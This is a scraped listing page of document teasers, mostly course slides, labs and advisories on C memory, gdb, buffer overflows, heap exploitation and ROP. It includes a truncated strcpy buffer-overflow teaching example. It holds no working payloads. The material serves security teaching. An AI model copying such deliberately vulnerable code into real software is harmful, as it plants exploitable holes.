Refresher When you add a number to a pointer, that number is added, but first it is multiplied by the sizeof the type the pointer points to. i.e. char *ptr1 = malloc(1); ptr1 + 1; // adds 1 to pointer
More informationBuffer Overflow. Jo, Heeseung
Buffer Overflow Jo, Heeseung IA-32/Linux Memory Layout Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationBUFFER OVERFLOW. Jo, Heeseung
BUFFER OVERFLOW Jo, Heeseung IA-32/LINUX MEMORY LAYOUT Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked
More informationcom_apple_avebridge::query Completion Invalid Read
Apple - com_apple_avebridge::query Completion Invalid Read Software Affected Versions CVE Reference Author Severity Vendor Vendor Response Apple macos, Apple ios macos 10.13.1 CVE-2017-13848 Alex Plaskett
More informationISA564 SECURITY LAB. Code Injection Attacks
ISA564 SECURITY LAB Code Injection Attacks Outline Anatomy of Code-Injection Attacks Lab 3: Buffer Overflow Anatomy of Code-Injection Attacks Background About 60% of CERT/CC advisories deal with unauthorized
More informationIntrusion Detection and Malware Analysis
Intrusion Detection and Malware Analysis Host Based Attacks Pavel Laskov Wilhelm Schickard Institute for Computer Science Software security threats Modification of program code viruses and self-replicating
More informationlast time Exam Review on the homework on office hour locations hardware description language programming language that compiles to circuits
last time Exam Review hardware description language programming language that compiles to circuits stages as conceptual division not the order things happen easier to figure out wiring stage-by-stage?
More informationcom_apple_avebridge::submi tdata NULL Dereference
Apple - com_apple_avebridge::submi tdata NULL Dereference Software Affected Versions CVE Reference Author Severity Vendor Vendor Response Apple macos, Apple ios macos 10.13.1 CVE-2017-13858 Alex Plaskett
More informationECE551 Midterm Version 1
Name: ECE551 Midterm Version 1 NetID: There are 7 questions, with the point values as shown below. You have 75 minutes with a total of 75 points. Pace yourself accordingly. This exam must be individual
More informationBLACKBERRY PWNAGE THE BLUEJAY STRIKES
BLACKBERRY PWNAGE THE BLUEJAY STRIKES Federico Muttis Core Security Technologies Session ID: HTA-T19 Session Classification: Advanced INFO @ THE MEDIA http://www.zdnet.com/blog/security/pwn2own-2011-blackberry-falls-to-webkit-browser-attack/8401
More informationRecitation: Attack Lab
15-213 Recitation: Attack Lab TA 11 Feb 2017 Agenda Reminders Stacks Attack Lab Activities Reminders Bomb lab is due tomorrow (14 Feb, 2017)! But if you wait until the last minute, it only takes a minute!
More informationStack overflow exploitation
Stack overflow exploitation In order to illustrate how the stack overflow exploitation goes I m going to use the following c code: #include #include #include static void
More information1. A student is testing an implementation of a C function; when compiled with gcc, the following x86-32 assembly code is produced:
This assignment refers to concepts discussed in the course notes on gdb and the book The Art of Debugging by Matloff & Salzman. The questions are definitely "hands-on" and will require some reading beyond
More informationLecture 07 Heap control data. Stephen Checkoway University of Illinois at Chicago
Lecture 07 Heap control data Stephen Checkoway University of Illinois at Chicago Layout of program memory Heap is managed by malloc - Many different malloc implementations - glibc uses a modified version
More informationProblem 1 (Void * generics) (24 points) (suggested time: 30 minutes)
Problem 1 (Void * generics) (24 points) (suggested time: 30 minutes) Given a sorted void * array of elements, the remove_duplicates function will remove all duplicates in the array, returning the new size
More informationSecure Coding in C and C++
Secure Coding in C and C++ Dynamic Memory Management Lecture 5 Sept 21, 2017 Acknowledgement: These slides are based on author Seacord s original presentation Issues Dynamic Memory Management Common Dynamic
More informationDefeat Exploit Mitigation Heap Attacks. compass-security.com 1
Defeat Exploit Mitigation Heap Attacks compass-security.com 1 ASCII Armor Arbitrary Write Overflow Local Vars Exploit Mitigations Stack Canary ASLR PIE Heap Overflows Brute Force Partial RIP Overwrite
More informationMemory Corruption 101 From Primitives to Exploit
Memory Corruption 101 From Primitives to Exploit Created by Nick Walker @ MWR Infosecurity / @tel0seh What is it? A result of Undefined Behaviour Undefined Behaviour A result of executing computer code
More informationMPATE-GE 2618: C Programming for Music Technology. Unit 4.1
MPATE-GE 2618: C Programming for Music Technology Unit 4.1 Memory Memory in the computer can be thought of as a long string of consecutive bytes. Each byte has a corresponding address. When we declare
More informationExploits and gdb. Tutorial 5
Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or
More informationSecurity Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40
Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing
More informationBuffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu IA-32/Linux Memory Layout Runtime stack (8MB limit) Heap Dynamically allocated storage
More informationROP It Like It s Hot!
Wednesday, December 3, 14 2014 Red Canari, Inc. All rights reserved. 1 I N F O R M AT I O N S E C U R I T Y ROP It Like It s Hot! A 101 on Buffer Overflows, Return Oriented Programming, & Shell- code Development
More informationLeveraging CVE for ASLR Bypass & RCE. Gal De Leon & Nadav Markus
Leveraging CVE-2015-7547 for ASLR Bypass & RCE Gal De Leon & Nadav Markus 1 Who We Are Nadav Markus, Gal De-Leon Security researchers @ PaloAltoNetworks Vulnerability research and exploitation Reverse
More informationBuffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts
This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security
More informationBlossom Hands-on exercises for computer forensics and security. Buffer Overflow
Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative
More informationExplicit Stabilisation. Verifying malloc. Natural specifications. Natural specifications. Including malloc s internal state. The crux of the proof
Explicit Stabilisation Verifying malloc John Wickerson / Mike Dodds / Matthew Parkinson University of Cambridge {p} c {q} pq G p stab q stab,g {! p "} c { # q $ } Basic p ::=...!p" #p$!p" = {q qp q stab
More informationDynamic Memory Allocation
Dynamic Memory Allocation The process of allocating memory at run time is known as dynamic memory allocation. C does not Inherently have this facility, there are four library routines known as memory management
More informationStack Debugging. Young W. Lim Sat. Young W. Lim Stack Debugging Sat 1 / 40
Stack Debugging Young W. Lim 2017-07-22 Sat Young W. Lim Stack Debugging 2017-07-22 Sat 1 / 40 Outline 1 Introduction References Compiling to IA32 Assembly Checking /proc//maps file Checking Stack
More informationGDB Tutorial. Young W. Lim Tue. Young W. Lim GDB Tutorial Tue 1 / 32
GDB Tutorial Young W. Lim 2017-02-14 Tue Young W. Lim GDB Tutorial 2017-02-14 Tue 1 / 32 Outline 1 Introduction Young W. Lim GDB Tutorial 2017-02-14 Tue 2 / 32 Based on "Self-service Linux: Mastering the
More informationLecture 9 Assertions and Error Handling CS240
Lecture 9 Assertions and Error Handling CS240 The C preprocessor The C compiler performs Macro expansion and directive handling Preprocessing directive lines, including file inclusion and conditional compilation,
More informationProgramming Studio #9 ECE 190
Programming Studio #9 ECE 190 Programming Studio #9 Concepts: Functions review 2D Arrays GDB Announcements EXAM 3 CONFLICT REQUESTS, ON COMPASS, DUE THIS MONDAY 5PM. NO EXTENSIONS, NO EXCEPTIONS. Functions
More informationCSE2301. Introduction
Warning: These notes are not complete, it is a Skelton that will be modified/add-to in the class. If you want to us them for studying, either attend the class or get the completed notes from someone who
More informationPRINCIPLES OF OPERATING SYSTEMS
PRINCIPLES OF OPERATING SYSTEMS Tutorial-1&2: C Review CPSC 457, Spring 2015 May 20-21, 2015 Department of Computer Science, University of Calgary Connecting to your VM Open a terminal (in your linux machine)
More informationBuffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu x86-64/linux Memory Layout Stack Runtime stack (8MB limit) Heap Dynamically allocated
More informationIBM AIX Heap Exploitation Methods. Presented by Tim Shelton
IBM AIX Heap Exploitation Methods Presented by Tim Shelton About HAWK HAWK Network Defense, Inc. Application and Network Security company incorporated in Texas focused on Security Information & Event Management
More informationSystems Programming. 08. Standard I/O Library. Alexander Holupirek
Systems Programming 08. Standard I/O Library Alexander Holupirek Database and Information Systems Group Department of Computer & Information Science University of Konstanz Summer Term 2008 Last lecture:
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationBuffer Overflow. Jinkyu Jeong Computer Systems Laboratory Sungkyunkwan University
Buffer Overflow Jinkyu Jeong (jinkyu@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu SSE2030: Introduction to Computer Systems, Spring 2018, Jinkyu Jeong (jinkyu@skku.edu)
More informationTI2725-C, C programming lab, course
Valgrind tutorial Valgrind is a tool which can find memory leaks in your programs, such as buffer overflows and bad memory management. This document will show per example how Valgrind responds to buggy
More informationModule: Program Vulnerabilities. Professor Trent Jaeger. CSE543 - Introduction to Computer and Network Security
CSE543 - Introduction to Computer and Network Security Module: Program Vulnerabilities Professor Trent Jaeger 1 1 Programming Why do we write programs? Function What functions do we enable via our programs?
More informationvoid P() {... y = Q(x); print(y); return; } ... int Q(int t) { int v[10];... return v[t]; } Computer Systems: A Programmer s Perspective
void P() { y = Q(x); print(y); return;... int Q(int t) { int v[10]; return v[t]; Computer Systems: A Programmer s Perspective %rax %rbx 0x101 0x41 0x7FFFFA8 0x1 0x7FFFFF8 0xB5A9 0x7FFFFF0 0x789ABC 0x7FFFFE8
More informationputting m bytes into a buffer of size n, for m>n corrupts the surrounding memory check size of data before/when writing
Secure Programming Lecture 4: Memory Corruption II (Stack & Heap Overflows) David Aspinall, Informatics @ Edinburgh 25th January 2018 Memory corruption Buffer overflow is a common vulnerability Simple
More informationCS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly
Raluca Popa Spring 2018 CS 161 Computer Security Discussion 1 Week of January 22, 2018: GDB and x86 assembly Objective: Studying memory vulnerabilities requires being able to read assembly and step through
More informationMemory corruption vulnerability exposure can be mitigated through memory hardening practices
Memory corruption vulnerability exposure can be mitigated through memory hardening practices OS vendors have a unique opportunity to fight memory corruption vulnerabilities through hardening the memory
More informationCSE351 Autumn 2013 Final Exam (11 Dec 2013)
CSE351 Autumn 2013 Final Exam (11 Dec 2013) Please read through the entire examination first! We designed this exam so that it can be completed in approximately 90 minutes and, hopefully, this estimate
More informationCS356: Discussion #8 Buffer-Overflow Attacks. Marco Paolieri
CS356: Discussion #8 Buffer-Overflow Attacks Marco Paolieri (paolieri@usc.edu) Previous Example #include void unreachable() { printf("impossible.\n"); void hello() { char buffer[6]; scanf("%s",
More informationCS 11 C track: lecture 6
CS 11 C track: lecture 6 Last week: pointer arithmetic This week: The gdb program struct typedef linked lists gdb for debugging (1) gdb: the Gnu DeBugger http://courses.cms.caltech.edu/cs11/material /c/mike/misc/gdb.html
More informationExercise Session 6 Computer Architecture and Systems Programming
Systems Group Department of Computer Science ETH Zürich Exercise Session 6 Computer Architecture and Systems Programming Herbstsemester 2016 Agenda GDB Outlook on assignment 6 GDB The GNU Debugger 3 Debugging..
More informationCS 2505 Computer Organization I Test 2. Do not start the test until instructed to do so! printed
Instructions: Print your name in the space provided below. This examination is closed book and closed notes, aside from the permitted one-page formula sheet. No calculators or other electronic devices
More informationDynamic memory. EECS 211 Winter 2019
Dynamic memory EECS 211 Winter 2019 2 Initial code setup $ cd eecs211 $ curl $URL211/lec/06dynamic.tgz tar zx $ cd 06dynamic 3 Oops! I made a mistake. In C, the declaration struct circle read_circle();
More informationCompiling C Programs Into x86-64 Assembly Programs
CSE 2421: Systems I Low-Level Programming and Computer Organization Compiling C Programs Into x86-64 Assembly Programs Part A: Function Calling Read/Study: Bryant 3.7.1-3.7.6 Presentation K Gojko Babić
More informationGlibc Adventures: The Forgotten Chunks
Glibc Adventures: The Forgotten Chunks François Goichon technical@contextis.com 28/01/2015 www.contextis.com Glibc Adventures: The Forgotten Chunks / Contents Contents 1 Abstract 3 2 Introduction 4 3 Abusing
More informationLab 03 - x86-64: atoi
CSCI0330 Intro Computer Systems Doeppner Lab 03 - x86-64: atoi Due: October 1, 2017 at 4pm 1 Introduction 1 2 Assignment 1 2.1 Algorithm 2 3 Assembling and Testing 3 3.1 A Text Editor, Makefile, and gdb
More informationECE551 Midterm Version 2
Name: ECE551 Midterm Version 2 NetID: There are 7 questions, with the point values as shown below. You have 75 minutes with a total of 75 points. Pace yourself accordingly. This exam must be individual
More informationBuffer Overflow Attack (AskCypert CLaaS)
Buffer Overflow Attack (AskCypert CLaaS) ---------------------- BufferOverflow.c code 1. int main(int arg c, char** argv) 2. { 3. char name[64]; 4. printf( Addr;%p\n, name); 5. strcpy(name, argv[1]); 6.
More informationProblem 1 (Void * generics) (24 points) (suggested time: 30 minutes)
Problem 1 (Void * generics) (24 points) (suggested time: 30 minutes) Given a sorted void * array of elements, the remove_duplicates function will remove all duplicates in the array, returning the new size
More informationSecure Programming Lecture 4: Memory Corruption II (Stack & Heap Overflows)
Secure Programming Lecture 4: Memory Corruption II (Stack & Heap Overflows) David Aspinall, Informatics @ Edinburgh 25th January 2018 Memory corruption Buffer overflow is a common vulnerability. Simple
More information